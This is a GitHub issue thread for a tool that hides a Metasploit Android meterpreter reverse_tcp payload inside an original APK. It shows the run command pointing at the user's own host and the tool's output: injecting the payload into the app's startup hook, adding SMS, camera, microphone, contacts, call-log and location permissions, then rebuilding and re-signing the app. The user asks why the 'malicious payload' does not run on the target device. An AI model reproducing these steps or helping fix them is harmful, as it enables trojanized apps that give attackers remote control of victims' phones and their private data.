0-ali / metasploit-apk-embed-payload

Embed a Metasploit Payload in an Original .Apk File

Embedded Payload not running #11

Closed homecoder closed 8 years ago

homecoder commented 8 years ago

Hi Team,

I am unsure if I am doing something wrong - I can't seem to get the _embedded APK

Environment: Fully updated Kali 2 (Rolling)

Command: ./run original.apk.file.apk -p android/meterpreter/reverse_tcp LHOST=my.domain.com

Notes: Creating a direct APK (msfvenom) using the same options worked exactly as expected.

Output from command:

Embed a Metasploit Payload in an Original .Apk File v0.2
[1] Generating msfvenom payload
[2] Signing payload
[3] Decomposing original APK
[4] Decomposing payload APK
[5] Locating onCreate() hook
[6] Copying payload files
[7] Loading StartupActivity.smali and injecting payload
[+] Adding android.permission.ACCESS_WIFI_STATE
[+] Adding android.permission.CHANGE_WIFI_STATE
[+] Adding android.permission.ACCESS_NETWORK_STATE
[+] Adding android.permission.ACCESS_COURSE_LOCATION
[+] Adding android.permission.ACCESS_FINE_LOCATION
[+] Adding android.permission.SEND_SMS
[+] Adding android.permission.RECEIVE_SMS
[+] Adding android.permission.RECORD_AUDIO
[+] Adding android.permission.CALL_PHONE
[+] Adding android.permission.READ_CONTACTS
[+] Adding android.permission.WRITE_CONTACTS
[+] Adding android.permission.RECORD_AUDIO
[+] Adding android.permission.CAMERA
[+] Adding android.permission.READ_SMS
[+] Adding android.permission.RECEIVE_BOOT_COMPLETED
[+] Adding android.permission.SET_WALLPAPER
[+] Adding android.permission.READ_CALL_LOG
[+] Adding android.permission.WRITE_CALL_LOG
[8] Rebuilding original.apk.file.apk with metasploit payload
W: warning: string 'chapter_no' has no default translation.
W: warning: string 'directory_error' has no default translation.
W: warning: string 'new_label_prompt' has no default translation.
W: warning: string 'prefs_split_screen_linked' has no default translation.
W: warning: string 'prefs_split_screen_not_linked' has no default translation.
W: warning: string 'prefs_split_screen_single' has no default translation.
W: warning: string 'prefs_split_screen_summary' has no default translation.
W: warning: string 'prefs_split_screen_title' has no default translation.
W: warning: string 'sdcard_error' has no default translation.
W: warning: string 'send_sms' has no default translation.
[9] Signing net_embedded.apk
[+]  has been embedded,original.apk.file.apk_embedded.apk

Is it possible that the warnings listed above could be preventing the embedded Metasploit APK from running? I didn't think much of it as it was a warning vs. an error.

0-ali commented 8 years ago

Hi @homecoder, you'll find it in the working dir of the script.

homecoder commented 8 years ago

@xc0d3rz,

NOT RUNNING and NOT FOUND are two different issues. For clarification, I found the _embedded APK; however, when running on the target Android device, the malicious payload is not running.

The Android device is my testing device, and is vulnerable to the exploit, as mentioned earlier, as running the payload directly from msfvenom works fine.

The issue is: I can run the script, I found the file with the embedded payload, but it does not work on the target device.